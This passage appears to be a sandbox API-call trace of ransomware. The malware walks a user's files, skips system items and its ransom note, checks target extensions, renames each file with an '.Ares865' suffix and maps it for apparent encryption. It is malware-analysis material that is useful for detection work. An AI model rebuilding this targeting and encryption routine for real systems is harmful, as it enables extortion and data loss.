0x31afc8 [0092.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.874] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0092.875] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.875] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0092.875] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.875] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.875] CloseHandle (hObject=0x15c) returned 1 [0092.875] CloseHandle (hObject=0x118) returned 1 [0092.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.876] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d510400, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3d510400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3d510400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x266, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-Wl8bPblcznhyYXJw.lnk", cAlternateFileName="-WL8BP~1.LNK")) returned 1 [0092.876] lstrcmpiW (lpString1="-Wl8bPblcznhyYXJw.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0092.876] lstrcmpiW (lpString1="-Wl8bPblcznhyYXJw.lnk", lpString2="aoldtz.exe") returned 1 [0092.876] lstrcmpiW (lpString1="-Wl8bPblcznhyYXJw.lnk", lpString2=".") returned 1 [0092.876] lstrcmpiW (lpString1="-Wl8bPblcznhyYXJw.lnk", lpString2="..") returned 1 [0092.877] lstrcmpiW (lpString1="-Wl8bPblcznhyYXJw.lnk", lpString2="windows") returned 1 [0092.877] lstrcmpiW (lpString1="-Wl8bPblcznhyYXJw.lnk", lpString2="bootmgr") returned 1 [0092.877] lstrcmpiW (lpString1="-Wl8bPblcznhyYXJw.lnk", lpString2="temp") returned 1 [0092.877] lstrcmpiW (lpString1="-Wl8bPblcznhyYXJw.lnk", lpString2="pagefile.sys") returned 1 [0092.877] lstrcmpiW (lpString1="-Wl8bPblcznhyYXJw.lnk", lpString2="boot") returned 1 [0092.877] lstrcmpiW (lpString1="-Wl8bPblcznhyYXJw.lnk", lpString2="ids.txt") returned 1 [0092.877] lstrcmpiW (lpString1="-Wl8bPblcznhyYXJw.lnk", lpString2="ntuser.dat") returned 1 [0092.877] lstrcmpiW (lpString1="-Wl8bPblcznhyYXJw.lnk", lpString2="perflogs") returned 1 [0092.877] lstrcmpiW (lpString1="-Wl8bPblcznhyYXJw.lnk", lpString2="MSBuild") returned 1 [0092.877] lstrlenW (lpString="-Wl8bPblcznhyYXJw.lnk") returned 21 [0092.877] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\-UzRn58SF_1E.lnk") returned 53 [0092.877] lstrcpyW (in: lpString1=0x2cce44a, lpString2="-Wl8bPblcznhyYXJw.lnk" | out: lpString1="-Wl8bPblcznhyYXJw.lnk") returned="-Wl8bPblcznhyYXJw.lnk" [0092.877] lstrlenW (lpString="-Wl8bPblcznhyYXJw.lnk") returned 21 [0092.877] lstrlenW (lpString="Ares865") returned 7 [0092.877] lstrcmpiW (lpString1="XJw.lnk", lpString2="Ares865") returned 1 [0092.877] lstrlenW (lpString=".dll") returned 4 [0092.877] lstrcmpiW (lpString1="-Wl8bPblcznhyYXJw.lnk", lpString2=".dll") returned 1 [0092.877] lstrlenW (lpString=".lnk") returned 4 [0092.877] lstrcmpiW (lpString1="-Wl8bPblcznhyYXJw.lnk", lpString2=".lnk") returned 1 [0092.877] lstrlenW (lpString=".ini") returned 4 [0092.877] lstrcmpiW (lpString1="-Wl8bPblcznhyYXJw.lnk", lpString2=".ini") returned 1 [0092.877] lstrlenW (lpString=".sys") returned 4 [0092.877] lstrcmpiW (lpString1="-Wl8bPblcznhyYXJw.lnk", lpString2=".sys") returned 1 [0092.877] lstrlenW (lpString="-Wl8bPblcznhyYXJw.lnk") returned 21 [0092.877] lstrlenW (lpString="bak") returned 3 [0092.877] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0092.877] lstrlenW (lpString="ba_") returned 3 [0092.877] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0092.877] lstrlenW (lpString="dbb") returned 3 [0092.877] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0092.877] lstrlenW (lpString="vmdk") returned 4 [0092.877] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0092.877] lstrlenW (lpString="rar") returned 3 [0092.877] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0092.877] lstrlenW (lpString="zip") returned 3 [0092.878] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0092.878] lstrlenW (lpString="tgz") returned 3 [0092.878] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0092.878] lstrlenW (lpString="vbox") returned 4 [0092.878] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0092.878] lstrlenW (lpString="vdi") returned 3 [0092.878] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0092.878] lstrlenW (lpString="vhd") returned 3 [0092.878] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0092.878] lstrlenW (lpString="vhdx") returned 4 [0092.878] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0092.878] lstrlenW (lpString="avhd") returned 4 [0092.878] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0092.878] lstrlenW (lpString="db") returned 2 [0092.878] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0092.878] lstrlenW (lpString="db2") returned 3 [0092.878] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0092.878] lstrlenW (lpString="db3") returned 3 [0092.878] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0092.878] lstrlenW (lpString="dbf") returned 3 [0092.878] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0092.878] lstrlenW (lpString="mdf") returned 3 [0092.878] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0092.878] lstrlenW (lpString="mdb") returned 3 [0092.878] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0092.878] lstrlenW (lpString="sql") returned 3 [0092.878] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0092.878] lstrlenW (lpString="sqlite") returned 6 [0092.878] lstrcmpiW (lpString1="Jw.lnk", lpString2="sqlite") returned -1 [0092.878] lstrlenW (lpString="sqlite3") returned 7 [0092.878] lstrcmpiW (lpString1="XJw.lnk", lpString2="sqlite3") returned 1 [0092.878] lstrlenW (lpString="sqlitedb") returned 8 [0092.878] lstrcmpiW (lpString1="YXJw.lnk", lpString2="sqlitedb") returned 1 [0092.878] lstrlenW (lpString="xml") returned 3 [0092.878] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0092.879] lstrlenW (lpString="$er") returned 3 [0092.879] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0092.879] lstrlenW (lpString="4dd") returned 3 [0092.879] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0092.879] lstrlenW (lpString="4dl") returned 3 [0092.879] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0092.879] lstrlenW (lpString="^^^") returned 3 [0092.879] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0092.879] lstrlenW (lpString="abs") returned 3 [0092.879] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0092.879] lstrlenW (lpString="abx") returned 3 [0092.879] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0092.879] lstrlenW (lpString="accdb") returned 5 [0092.879] lstrcmpiW (lpString1="w.lnk", lpString2="accdb") returned 1 [0092.879] lstrlenW (lpString="accdc") returned 5 [0092.879] lstrcmpiW (lpString1="w.lnk", lpString2="accdc") returned 1 [0092.879] lstrlenW (lpString="accde") returned 5 [0092.879] lstrcmpiW (lpString1="w.lnk", lpString2="accde") returned 1 [0092.879] lstrlenW (lpString="accdr") returned 5 [0092.879] lstrcmpiW (lpString1="w.lnk", lpString2="accdr") returned 1 [0092.879] lstrlenW (lpString="accdt") returned 5 [0092.879] lstrcmpiW (lpString1="w.lnk", lpString2="accdt") returned 1 [0092.879] lstrlenW (lpString="accdw") returned 5 [0092.879] lstrcmpiW (lpString1="w.lnk", lpString2="accdw") returned 1 [0092.879] lstrlenW (lpString="accft") returned 5 [0092.879] lstrcmpiW (lpString1="w.lnk", lpString2="accft") returned 1 [0092.879] lstrlenW (lpString="adb") returned 3 [0092.879] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.879] lstrlenW (lpString="adb") returned 3 [0092.879] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.879] lstrlenW (lpString="ade") returned 3 [0092.879] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0092.879] lstrlenW (lpString="adf") returned 3 [0092.879] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0092.879] lstrlenW (lpString="adn") returned 3 [0092.879] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0092.880] lstrlenW (lpString="adp") returned 3 [0092.880] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0092.880] lstrlenW (lpString="alf") returned 3 [0092.880] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0092.880] lstrlenW (lpString="ask") returned 3 [0092.880] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0092.880] lstrlenW (lpString="btr") returned 3 [0092.880] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0092.880] lstrlenW (lpString="cat") returned 3 [0092.880] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0092.880] lstrlenW (lpString="cdb") returned 3 [0092.880] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0092.880] lstrlenW (lpString="ckp") returned 3 [0092.880] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0092.880] lstrlenW (lpString="cma") returned 3 [0092.880] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0092.880] lstrlenW (lpString="cpd") returned 3 [0092.880] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0092.880] lstrlenW (lpString="dacpac") returned 6 [0092.880] lstrcmpiW (lpString1="Jw.lnk", lpString2="dacpac") returned 1 [0092.880] lstrlenW (lpString="dad") returned 3 [0092.880] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0092.880] lstrlenW (lpString="dadiagrams") returned 10 [0092.880] lstrcmpiW (lpString1="hyYXJw.lnk", lpString2="dadiagrams") returned 1 [0092.880] lstrlenW (lpString="daschema") returned 8 [0092.880] lstrcmpiW (lpString1="YXJw.lnk", lpString2="daschema") returned 1 [0092.880] lstrlenW (lpString="db-journal") returned 10 [0092.880] lstrcmpiW (lpString1="hyYXJw.lnk", lpString2="db-journal") returned 1 [0092.880] lstrlenW (lpString="db-shm") returned 6 [0092.880] lstrcmpiW (lpString1="Jw.lnk", lpString2="db-shm") returned 1 [0092.880] lstrlenW (lpString="db-wal") returned 6 [0092.880] lstrcmpiW (lpString1="Jw.lnk", lpString2="db-wal") returned 1 [0092.880] lstrlenW (lpString="dbc") returned 3 [0092.880] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0092.880] lstrlenW (lpString="dbs") returned 3 [0092.880] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0092.881] lstrlenW (lpString="dbt") returned 3 [0092.881] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0092.881] lstrlenW (lpString="dbv") returned 3 [0092.881] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0092.881] lstrlenW (lpString="dbx") returned 3 [0092.881] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0092.881] lstrlenW (lpString="dcb") returned 3 [0092.881] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0092.881] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\-Wl8bPblcznhyYXJw.lnk.Ares865") returned 66 [0092.881] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\-Wl8bPblcznhyYXJw.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\-wl8bpblcznhyyxjw.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\-Wl8bPblcznhyYXJw.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\-wl8bpblcznhyyxjw.lnk.ares865"), dwFlags=0x1) returned 1 [0092.882] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\-Wl8bPblcznhyYXJw.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\-wl8bpblcznhyyxjw.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.882] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=614) returned 1 [0092.882] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.883] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.883] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.883] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.883] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.883] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.884] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x570, lpName=0x0) returned 0x15c [0092.884] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x570) returned 0x190000 [0092.884] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.885] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.885] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0092.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0092.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.885] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.885] CloseHandle (hObject=0x15c) returned 1 [0092.885] CloseHandle (hObject=0x118) returned 1 [0092.886] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.886] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.886] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.887] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c54b240, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3c54b240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3c54b240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1a98, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0C2GlXlTsaR5QR5KFI5w.lnk", cAlternateFileName="0C2GLX~1.LNK")) returned 1 [0092.887] lstrcmpiW (lpString1="0C2GlXlTsaR5QR5KFI5w.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.887] lstrcmpiW (lpString1="0C2GlXlTsaR5QR5KFI5w.lnk", lpString2="aoldtz.exe") returned -1 [0092.887] lstrcmpiW (lpString1="0C2GlXlTsaR5QR5KFI5w.lnk", lpString2=".") returned 1 [0092.887] lstrcmpiW (lpString1="0C2GlXlTsaR5QR5KFI5w.lnk", lpString2="..") returned 1 [0092.887] lstrcmpiW (lpString1="0C2GlXlTsaR5QR5KFI5w.lnk", lpString2="windows") returned -1 [0092.887] lstrcmpiW (lpString1="0C2GlXlTsaR5QR5KFI5w.lnk", lpString2="bootmgr") returned -1 [0092.887] lstrcmpiW (lpString1="0C2GlXlTsaR5QR5KFI5w.lnk", lpString2="temp") returned -1 [0092.887] lstrcmpiW (lpString1="0C2GlXlTsaR5QR5KFI5w.lnk", lpString2="pagefile.sys") returned -1 [0092.887] lstrcmpiW (lpString1="0C2GlXlTsaR5QR5KFI5w.lnk", lpString2="boot") returned -1 [0092.887] lstrcmpiW (lpString1="0C2GlXlTsaR5QR5KFI5w.lnk", lpString2="ids.txt") returned -1 [0092.887] lstrcmpiW (lpString1="0C2GlXlTsaR5QR5KFI5w.lnk", lpString2="ntuser.dat") returned -1 [0092.887] lstrcmpiW (lpString1="0C2GlXlTsaR5QR5KFI5w.lnk", lpString2="perflogs") returned -1 [0092.887] lstrcmpiW (lpString1="0C2GlXlTsaR5QR5KFI5w.lnk", lpString2="MSBuild") returned -1 [0092.887] lstrlenW (lpString="0C2GlXlTsaR5QR5KFI5w.lnk") returned 24 [0092.887] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\-Wl8bPblcznhyYXJw.lnk") returned 58 [0092.887] lstrcpyW (in: lpString1=0x2cce44a, lpString2="0C2GlXlTsaR5QR5KFI5w.lnk" | out: lpString1="0C2GlXlTsaR5QR5KFI5w.lnk") returned="0C2GlXlTsaR5QR5KFI5w.lnk" [0092.887] lstrlenW (lpString="0C2GlXlTsaR5QR5KFI5w.lnk") returned 24 [0092.887] lstrlenW (lpString="Ares865") returned 7 [0092.887] lstrcmpiW (lpString1="I5w.lnk", lpString2="Ares865") returned 1 [0092.887] lstrlenW (lpString=".dll") returned 4 [0092.887] lstrcmpiW (lpString1="0C2GlXlTsaR5QR5KFI5w.lnk", lpString2=".dll") returned 1 [0092.887] lstrlenW (lpString=".lnk") returned 4 [0092.887] lstrcmpiW (lpString1="0C2GlXlTsaR5QR5KFI5w.lnk", lpString2=".lnk") returned 1 [0092.887] lstrlenW (lpString=".ini") returned 4 [0092.887] lstrcmpiW (lpString1="0C2GlXlTsaR5QR5KFI5w.lnk", lpString2=".ini") returned 1 [0092.887] lstrlenW (lpString=".sys") returned 4 [0092.887] lstrcmpiW (lpString1="0C2GlXlTsaR5QR5KFI5w.lnk", lpString2=".sys") returned 1 [0092.887] lstrlenW (lpString="0C2GlXlTsaR5QR5KFI5w.lnk") returned 24 [0092.888] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\0C2GlXlTsaR5QR5KFI5w.lnk.Ares865") returned 69 [0092.888] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\0C2GlXlTsaR5QR5KFI5w.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\0c2glxltsar5qr5kfi5w.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\0C2GlXlTsaR5QR5KFI5w.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\0c2glxltsar5qr5kfi5w.lnk.ares865"), dwFlags=0x1) returned 1 [0092.889] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\0C2GlXlTsaR5QR5KFI5w.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\0c2glxltsar5qr5kfi5w.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.889] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6808) returned 1 [0092.889] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.889] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.889] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.889] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.890] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.890] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.890] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1da0, lpName=0x0) returned 0x15c [0092.890] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1da0) returned 0x190000 [0092.891] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.892] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.892] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.892] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.892] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.892] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.892] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.892] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.892] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.892] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0092.892] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.892] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0092.892] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.892] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.892] CloseHandle (hObject=0x15c) returned 1 [0092.892] CloseHandle (hObject=0x118) returned 1 [0092.894] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.894] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.894] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.894] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x392dc020, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x392dc020, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x392dc020, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xe4f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0jIgSp-.ots.lnk", cAlternateFileName="0JIGSP~1.LNK")) returned 1 [0092.894] lstrcmpiW (lpString1="0jIgSp-.ots.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.894] lstrcmpiW (lpString1="0jIgSp-.ots.lnk", lpString2="aoldtz.exe") returned -1 [0092.894] lstrcmpiW (lpString1="0jIgSp-.ots.lnk", lpString2=".") returned 1 [0092.894] lstrcmpiW (lpString1="0jIgSp-.ots.lnk", lpString2="..") returned 1 [0092.894] lstrcmpiW (lpString1="0jIgSp-.ots.lnk", lpString2="windows") returned -1 [0092.894] lstrcmpiW (lpString1="0jIgSp-.ots.lnk", lpString2="bootmgr") returned -1 [0092.894] lstrcmpiW (lpString1="0jIgSp-.ots.lnk", lpString2="temp") returned -1 [0092.894] lstrcmpiW (lpString1="0jIgSp-.ots.lnk", lpString2="pagefile.sys") returned -1 [0092.894] lstrcmpiW (lpString1="0jIgSp-.ots.lnk", lpString2="boot") returned -1 [0092.894] lstrcmpiW (lpString1="0jIgSp-.ots.lnk", lpString2="ids.txt") returned -1 [0092.894] lstrcmpiW (lpString1="0jIgSp-.ots.lnk", lpString2="ntuser.dat") returned -1 [0092.894] lstrcmpiW (lpString1="0jIgSp-.ots.lnk", lpString2="perflogs") returned -1 [0092.894] lstrcmpiW (lpString1="0jIgSp-.ots.lnk", lpString2="MSBuild") returned -1 [0092.894] lstrlenW (lpString="0jIgSp-.ots.lnk") returned 15 [0092.894] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\0C2GlXlTsaR5QR5KFI5w.lnk") returned 61 [0092.894] lstrcpyW (in: lpString1=0x2cce44a, lpString2="0jIgSp-.ots.lnk" | out: lpString1="0jIgSp-.ots.lnk") returned="0jIgSp-.ots.lnk" [0092.894] lstrlenW (lpString="0jIgSp-.ots.lnk") returned 15 [0092.894] lstrlenW (lpString="Ares865") returned 7 [0092.894] lstrcmpiW (lpString1="ots.lnk", lpString2="Ares865") returned 1 [0092.894] lstrlenW (lpString=".dll") returned 4 [0092.894] lstrcmpiW (lpString1="0jIgSp-.ots.lnk", lpString2=".dll") returned 1 [0092.894] lstrlenW (lpString=".lnk") returned 4 [0092.895] lstrcmpiW (lpString1="0jIgSp-.ots.lnk", lpString2=".lnk") returned 1 [0092.895] lstrlenW (lpString=".ini") returned 4 [0092.895] lstrcmpiW (lpString1="0jIgSp-.ots.lnk", lpString2=".ini") returned 1 [0092.895] lstrlenW (lpString=".sys") returned 4 [0092.895] lstrcmpiW (lpString1="0jIgSp-.ots.lnk", lpString2=".sys") returned 1 [0092.895] lstrlenW 